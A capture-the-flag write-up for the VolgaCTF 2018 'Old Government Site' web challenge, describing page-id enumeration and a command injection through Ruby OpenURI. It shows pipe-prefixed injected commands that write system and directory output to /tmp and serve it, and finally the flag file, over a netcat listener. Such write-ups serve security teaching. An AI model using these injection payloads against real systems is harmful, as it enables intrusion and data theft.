This is my writeup for the Web 150 VolgaCTF 2018 Quals challenge named "Old Government Site". In this challenge, users are presented with an "old government site" that looks like the following:

Navigating through the site, the user can see that each page essentially changes with a unique page id parameter within the URL.

The page ids aren't really sequential either, so I suspected that there is likely a hidden page somewhere that is not within the original HTML. I wrote the below snippet in Python to enumerate potential hidden pages:

The script found a page with id=18 to be valid, and it appeared to be a garbage pickup registration form. When entering a valid web page and submitting, you get a "validated" confirmation message:

I figured there's probably some sort of command injection here, where the attacker needed to validate and somehow tack on an extra command to be executed. When requesting a page that doesn't exist, you get web server error that indicates it's being on run on Sinatra, which is written in Ruby. I googled around to see how HTTP requests were made in Ruby. OpenURI ended up being the correct method, and with a quick search you can see that it is command-injectable. Testing the OR ("| ") approach, the command is validated, but we still don't get any output:

To check to make sure my commands were actually running, I went through the painful process of piping output to files within /tmp and then serving them up using netcat:

| uname > /tmp/uname
| nc -l -p 32533< /tmp/uname 
Linux old-goverment 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

Web app source:

Although it didn't contain the flag, it still validated my command injection approach. Many injections and netcats later, I found a file named "flag" in the root directory:

| ls -la / > /tmp/root_ls.out
| nc -l -p 32533< /tmp/root_ls.out

drwxr-xr-x  22 root root  4096 Mar 23 19:08 .
drwxr-xr-x  22 root root  4096 Mar 23 19:08 ..
drwxr-xr-x   2 root root  4096 Mar 23 19:05 bin
drwxr-xr-x   3 root root  4096 Mar 23 19:05 boot
drwxr-xr-x  17 root root  3680 Mar 24 18:39 dev
drwxr-xr-x  95 root root  4096 Mar 24 18:39 etc
-rw-r--r--   1 root root    41 Mar 23 19:37 flag
drwxr-xr-x   2 root root  4096 Apr 13  2016 home
lrwxrwxrwx   1 root root    33 Mar 16 19:01 initrd.img -> boot/initrd.img-4.4.0-116-generic
drwxr-xr-x  20 root root  4096 Mar 16 19:03 lib
drwxr-xr-x   2 root root  4096 Mar 16 19:02 lib64
drwx------   2 root root 16384 Mar 16 19:00 lost+found
drwxr-xr-x   2 root root  4096 Mar 16 19:00 media
drwxr-xr-x   2 root root  4096 Mar 16 19:00 mnt
drwxr-xr-x   3 root root  4096 Mar 23 19:37 opt
dr-xr-xr-x 397 root root     0 Mar 24 18:39 proc
drwx------   7 root root  4096 Mar 23 20:18 root
drwxr-xr-x  18 root root   580 Mar 24 18:40 run
drwxr-xr-x   2 root root  4096 Mar 23 19:05 sbin
drwxr-xr-x   2 root root  4096 Mar 16 19:00 srv
dr-xr-xr-x  13 root root     0 Mar 24 19:25 sys
drwxrwxrwt   8 root root  4096 Mar 25 08:56 tmp
drwxr-xr-x  10 root root  4096 Mar 16 19:00 usr
drwxr-xr-x  11 root root  4096 Mar 16 19:00 var
lrwxrwxrwx   1 root root    30 Mar 16 19:01 vmlinuz -> boot/vmlinuz-4.4.0-116-generic

| nc -l -p 32533< /flag